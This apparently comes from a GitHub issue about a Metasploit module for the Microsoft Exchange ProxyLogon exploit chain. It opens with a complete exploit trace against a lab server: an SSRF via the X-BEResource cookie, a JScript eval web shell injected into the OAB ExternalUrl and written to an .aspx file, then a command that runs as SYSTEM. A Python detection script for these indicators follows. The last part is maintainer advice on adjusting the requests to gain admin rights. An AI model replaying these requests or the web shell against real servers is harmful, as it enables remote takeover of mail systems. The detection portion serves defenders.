Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.&a=~2042160395; ASP.NET_SessionId=add16fb3-f7c7-4aa8-a2de-63bc2199acdb; msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.;
msExchLogonMailbox: S-1-5-21-3876225949-3666446388-246247518-500
msExchTargetMailbox: S-1-5-21-3876225949-3666446388-246247518-500
Content-Type: application/json; charset=utf-8
Content-Length: 159

{"filter":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","SelectedView":"","SelectedVDirType":"OAB"}},"sort":{}}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
request-id: 959d70bd-14f8-44a5-8d44-8a536932c6e2
Set-Cookie: ClientId=FNEC0HZ0YDVRGGA; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab
X-Content-Type-Options: nosniff
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:49 GMT
Content-Length: 590

{"d":{"__type":"JsonDictionaryOfanyTypeResults:ECP","Cmdlets":["Get-OabVirtualDirectory"],"ErrorRecords":[],"Informations":[],"IsDDIEnabled":false,"Warnings":[],"Output":[{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","Name":"OAB (Default Web Site)","Server":"LAB-AD01","AdminDisplayName":"","WhenChanged":"26\/03\/2021 16:26","Identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"5f342854-3a90-4f76-a960-2fd59761e912"},"MajorVersion":15,"Version":"Version 15.0 (Build 1497.2)","Version_s":1941997017,"VDirType":"OAB"}]}}
[*] ASP.NET_SessionId: add16fb3-f7c7-4aa8-a2de-63bc2199acdb
[*] msExchEcpCanary: cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.
[*] OAB id: 5f342854-3a90-4f76-a960-2fd59761e912 (OAB (Default Web Site))
[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-27065
[*] Prepare the payload on the remote target
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.&a=~2059077475; ASP.NET_SessionId=add16fb3-f7c7-4aa8-a2de-63bc2199acdb; msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.;
msExchLogonMailbox: S-1-5-21-3876225949-3666446388-246247518-500
msExchTargetMailbox: S-1-5-21-3876225949-3666446388-246247518-500
Content-Type: application/json; charset=utf-8
Content-Length: 400

{"identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"5f342854-3a90-4f76-a960-2fd59761e912"},"properties":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","ExternalUrl":"http://o/#\u003cscript language=\"JScript\" runat=\"server\"\u003efunction Page_Load(){eval(Request[\"kEEppo\"],\"unsafe\");}\u003c/script\u003e"}}}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
request-id: 831f1d45-6c59-4ae5-b380-f98cbdbec9a8
Set-Cookie: ClientId=IJCCXMCKAVMAAXZDCZG; expires=Sat, 26-Mar-2022 17:30:50 GMT; path=/; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab
X-Content-Type-Options: nosniff
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:52 GMT
Content-Length: 716

{"d":{"__type":"JsonDictionaryOfanyTypeResults:ECP","Cmdlets":["Set-OabVirtualDirectory","Get-OabVirtualDirectory"],"ErrorRecords":[],"Informations":[],"IsDDIEnabled":false,"Warnings":[],"NoAccessProperties":[],"Output":[{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","Server":"LAB-AD01","WhenChanged":"26\/03\/2021 21:30","Identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"5f342854-3a90-4f76-a960-2fd59761e912"},"Name":"OAB (Default Web Site)","Version":"Version 15.0 (Build 1497.2)","VDirType":"OAB"}],"ReadOnlyProperties":[],"Validators":{"__type":"JsonDictionaryOfArrayOfValidatorInfoQ5wmCri2:#Microsoft.Exchange.Management.ControlPanel"}}}
[*] Write the payload on the remote target
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.&a=~2083327634; ASP.NET_SessionId=add16fb3-f7c7-4aa8-a2de-63bc2199acdb; msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.;
msExchLogonMailbox: S-1-5-21-3876225949-3666446388-246247518-500
msExchTargetMailbox: S-1-5-21-3876225949-3666446388-246247518-500
Content-Type: application/json; charset=utf-8
Content-Length: 365

{"identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"5f342854-3a90-4f76-a960-2fd59761e912"},"properties":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","FilePathName":"\\\\127.0.0.1\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\hqpu.aspx"}}}
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
request-id: a781c201-e641-44ab-98e7-5d439e8443fe
Set-Cookie: ClientId=FULRWTG0WTBFBSLVBNQ; expires=Sat, 26-Mar-2022 17:30:52 GMT; path=/; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab
X-Content-Type-Options: nosniff
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:52 GMT
Content-Length: 201

{"d":{"__type":"JsonDictionaryOfanyTypeResults:ECP","Cmdlets":[],"ErrorRecords":[],"Informations":[],"IsDDIEnabled":false,"ProgressId":"39b2e43a-634b-44ec-b217-8d1a96586c93","Warnings":[],"Output":[]}}
####################
# Request:
####################
GET /owa/auth/hqpu.aspx HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0


####################
# Response:
####################
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /owa/auth/errorFE.aspx?httpCode=404
Server: Microsoft-IIS/8.5
request-id: 55ba7d22-38d9-4ecf-98e3-5de5d582852d
Set-Cookie: ClientId=UETG9IICUUDSYPSKQ; expires=Sat, 26-Mar-2022 17:30:52 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 17:30:52 GMT
Content-Length: 152

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/owa/auth/errorFE.aspx?httpCode=404">here</a>.</h2>
</body></html>

[!] Wait a lot (0)
####################
# Request:
####################
GET /owa/auth/hqpu.aspx HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
request-id: 0b7df229-c91e-4794-b90f-a94c6eca7eeb
Set-Cookie: ClientId=YFSSUTHREJZITCHJKW; expires=Sat, 26-Mar-2022 17:30:59 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 17:30:59 GMT
Content-Length: 2080

Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             : 
RequireSSL                      : True
BasicAuthentication             : False
WindowsAuthentication           : True
OAuthAuthentication             : False
MetabasePath                    : IIS://LAB-AD01.pwned.lab/W3SVC/1/ROOT/OAB
Path                            : C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         : 
ExtendedProtectionSPNList       : 
AdminDisplayVersion             : Version 15.0 (Build 1497.2)
Server                          : LAB-AD01
InternalUrl                     : https://lab-ad01.pwned.lab/OAB
InternalAuthenticationMethods   : WindowsIntegrated
ExternalUrl                     : http://o/#
ExternalAuthenticationMethods   : WindowsIntegrated
AdminDisplayName                : 
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName               : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=LAB-AD01,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=Pwned Lab2k13,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=pwned,DC=lab
Identity                        : LAB-AD01\OAB (Default Web Site)
Guid                            : 5f342854-3a90-4f76-a960-2fd59761e912
ObjectCategory                  : pwned.lab/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                  msExchVirtualDirectory
                                  msExchOABVirtualDirectory
WhenChanged                     : 26/03/2021 21:30:50
WhenCreated                     : 26/03/2021 16:26:12
WhenChangedUTC                  : 26/03/2021 17:30:50
WhenCreatedUTC                  : 26/03/2021 12:26:12
OrganizationId                  : 
Id                              : LAB-AD01\OAB (Default Web Site)
OriginatingServer               : LAB-AD01.pwned.lab
IsValid                         : True


[+] Yeeting cmd/windows/generic payload at 172.20.2.110:443
####################
# Request:
####################
POST /owa/auth/hqpu.aspx HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

kEEppo=Response.Write(new ActiveXObject("WScript.Shell").Exec("cmd /c whoami").StdOut.ReadAll());
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
request-id: 6d075f44-9279-4340-8428-cf034c3044b4
Set-Cookie: ClientId=PKMFHFTIKOIGGQVWBZXA; expires=Sat, 26-Mar-2022 17:30:59 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 17:30:59 GMT
Content-Length: 2101

nt authority\system
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             : 
RequireSSL                      : True
BasicAuthentication             : False
WindowsAuthentication           : True
OAuthAuthentication             : False
MetabasePath                    : IIS://LAB-AD01.pwned.lab/W3SVC/1/ROOT/OAB
Path                            : C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         : 
ExtendedProtectionSPNList       : 
AdminDisplayVersion             : Version 15.0 (Build 1497.2)
Server                          : LAB-AD01
InternalUrl                     : https://lab-ad01.pwned.lab/OAB
InternalAuthenticationMethods   : WindowsIntegrated
ExternalUrl                     : http://o/#
ExternalAuthenticationMethods   : WindowsIntegrated
AdminDisplayName                : 
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName               : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=LAB-AD01,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=Pwned Lab2k13,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=pwned,DC=lab
Identity                        : LAB-AD01\OAB (Default Web Site)
Guid                            : 5f342854-3a90-4f76-a960-2fd59761e912
ObjectCategory                  : pwned.lab/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                  msExchVirtualDirectory
                                  msExchOABVirtualDirectory
WhenChanged                     : 26/03/2021 21:30:50
WhenCreated                     : 26/03/2021 16:26:12
WhenChangedUTC                  : 26/03/2021 17:30:50
WhenCreatedUTC                  : 26/03/2021 12:26:12
OrganizationId                  : 
Id                              : LAB-AD01\OAB (Default Web Site)
OriginatingServer               : LAB-AD01.pwned.lab
IsValid                         : True


[!] Dumping command output in response
nt authority\system

[!] This exploit may require manual cleanup of 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\hqpu.aspx' on the target

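The trace above shows the whole chain a defender would want to pick out of front-end proxy logs: the SSRF through the X-BEResource cookie to the backend DDIService, a SetObject on the OABVirtualDirectory schema that plants server-side script in ExternalUrl, a ResetOABVirtualDirectory whose FilePathName writes the .aspx under the front-end web root, and then the request to the dropped page. The following is an added detection example, not code from this issue or from the module; it runs over constructed request records modelled on the trace. The indicator names, the web-root mapping (treating FrontEnd\HttpProxy as the front-end web root, consistent with the OAB vdir Path printed above) and the sample records are the example's own assumptions.

```python
import json
import re
from urllib.parse import parse_qsl

# Cookie value shape used by the front-end SSRF: [:[@<backend-host>:<port>/<path>?<query>
BERESOURCE_RE = re.compile(r"^\[:\[@(?P<host>[^:/\]]+):(?P<port>\d+)(?P<path>/.*)$")
# Server-side script injected into the OAB virtual directory's ExternalUrl
SERVER_SCRIPT_RE = re.compile(r"<script[^>]*runat\s*=\s*[\"']?server", re.IGNORECASE)
# Assumption: FrontEnd\HttpProxy is the web root the dropped .aspx is served from
# (consistent with the OAB vdir 'Path' in the trace), so the path after it is the URL.
FE_WEBROOT_MARKER = "\\frontend\\httpproxy\\"


def parse_cookies(header):
    """Split a Cookie header into a dict without validating characters (the
    exploit cookie contains '[', ':' and '@', which stricter parsers reject)."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value
    return cookies


def parse_beresource(value):
    """Decode an X-BEResource cookie into the backend target it proxies to."""
    m = BERESOURCE_RE.match(value or "")
    if not m:
        return None
    path, _, query = m.group("path").partition("?")
    return {"host": m.group("host"), "port": int(m.group("port")), "path": path,
            "params": dict(parse_qsl(query, keep_blank_values=True))}


def web_path_from_unc(file_path):
    """Map a FilePathName under the front-end web root to the URL it is served at."""
    idx = file_path.lower().find(FE_WEBROOT_MARKER)
    if idx < 0:
        return None
    return "/" + file_path[idx + len(FE_WEBROOT_MARKER):].replace("\\", "/")


def ddi_parameters(body):
    """Extract properties.Parameters from a DDIService SetObject JSON body."""
    try:
        return json.loads(body)["properties"]["Parameters"]
    except (ValueError, KeyError, TypeError):
        return {}


def analyze(requests):
    """Return (index, indicator, detail) tuples for the chain stages found."""
    findings, dropped = [], set()
    for i, req in enumerate(requests):
        be = parse_beresource(parse_cookies(req["headers"].get("Cookie", "")).get("X-BEResource"))
        if be is None:
            if req["path"].lower() in dropped:      # request to a page an earlier stage dropped
                findings.append((i, "webshell-access", f"{req['method']} {req['path']}"))
            continue
        findings.append((i, "ssrf-beresource", f"{be['host']}:{be['port']}{be['path']}"))
        if not be["path"].lower().endswith("/ddi/ddiservice.svc/setobject"):
            continue
        schema, params = be["params"].get("schema", ""), ddi_parameters(req.get("body", ""))
        if schema == "OABVirtualDirectory" and SERVER_SCRIPT_RE.search(params.get("ExternalUrl", "")):
            findings.append((i, "oab-externalurl-script", params["ExternalUrl"]))
        if schema == "ResetOABVirtualDirectory":
            fp = params.get("FilePathName", "")
            if fp.lower().endswith(".aspx"):
                findings.append((i, "oab-reset-aspx-drop", fp))
                wp = web_path_from_unc(fp)
                if wp:
                    dropped.add(wp.lower())
    return findings


def ddi_body(parameters):
    """Constructed SetObject body in the shape the trace shows."""
    params = {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel"}
    params.update(parameters)
    return json.dumps({"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)",
                                    "RawIdentity": "5f342854-3a90-4f76-a960-2fd59761e912"},
                       "properties": {"Parameters": params}})


def _ssrf_cookie(schema):
    # Constructed: canary and session values are placeholders, not the trace's real ones.
    return ("X-BEResource=[:[@lab-ad01.pwned.lab:444/ecp/DDI/DDIService.svc/SetObject"
            f"?schema={schema}&msExchEcpCanary=CANARY&a=~2059077475; ASP.NET_SessionId=SESSION")


# Constructed sample modelled on the trace: the exploit requests, then a benign one.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/ecp/SNu.js", "headers": {"Cookie": _ssrf_cookie("OABVirtualDirectory")},
     "body": ddi_body({"ExternalUrl": 'http://o/#<script language="JScript" runat="server">'
                                      "/* eval-based shell as in the trace */</script>"})},
    {"method": "POST", "path": "/ecp/SNu.js", "headers": {"Cookie": _ssrf_cookie("ResetOABVirtualDirectory")},
     "body": ddi_body({"FilePathName": r"\\127.0.0.1\C$\Program Files\Microsoft\Exchange Server"
                                       r"\V15\FrontEnd\HttpProxy\owa\auth\hqpu.aspx"})},
    {"method": "POST", "path": "/owa/auth/hqpu.aspx", "headers": {}, "body": "kEEppo=<jscript omitted>"},
    {"method": "GET", "path": "/owa/auth/logon.aspx", "headers": {}, "body": ""},
]

if __name__ == "__main__":
    for index, indicator, detail in analyze(SAMPLE_REQUESTS):
        print(f"request {index}: {indicator}: {detail}")
```

The X-BEResource cookie on its own is the strongest single signal: legitimate clients never send it, and decoding it tells you which backend path was targeted. Correlating the dropped FilePathName with later requests to the same URL is what separates a probe from a successful write.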
@mekhalleh
Owner

The response for POST /ecp/Lf.js HTTP/1.1 (the one with the <AcceptableResponseSchema>) comes with a parameter in the header: Set-Cookie: X-BackEndCookie=S-1-5-18 ... which I've read is local admin.

After the second POST /ecp/Lf.js HTTP/1.1 with the LegacyDN this time, the response comes with:

Microsoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '[LegacyDN]' with SID S-1-5-21-.... and MasterAccountSid (StoreError=LoginPerm)

SID S-1-5-21 is for Domain Admin.
And I think that's the problem: the cookies should be set to S-1-5-21?

https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/security-identifiers-in-windows

SID                 Name           Description
S-1-5-18            Local System   A service account that is used by the operating system.
S-1-5-20            NT Authority   Network Service
S-1-5-21domain-500  Administrator  A user account for the system administrator. By default, it's the only user account that is given full control over the system.

The domain SID ends in 500 (and it has this shape: S-1-5-21-3876225949-3666446388-246247518-500). I don't think you can just use S-1-5-21.

SID S-1-5-18 is not the cause of the issue, because it seems normal to me to find it in the answers. The service runs as the local system account...

On the other hand, instead of the domain SID you can normally use this one: S-1-5-20. But it's more interesting to have something variable for the detection probes; that's why we patched the user's SID rather than using S-1-5-20.

Did you test the Praetorian PoC (https://github.com/praetorian-inc/proxylogon-exploit)? Does it work for you? If so, I would make adjustments.

@mekhalleh
Owner

Rapid7 confirms that the module works with the latest changes (rapid7/metasploit-framework#14945).

See rapid7/metasploit-framework#14945 (comment).

But again, some instances of Microsoft Exchange need more investigation. Basically, the code base remains the same, but you need to play with the requests to get admin rights.

You need to look around the request to proxyLogon.ecp and the next one that gets the OAB Id. If this works, the rest will work.

Everything goes in the search_oab function.
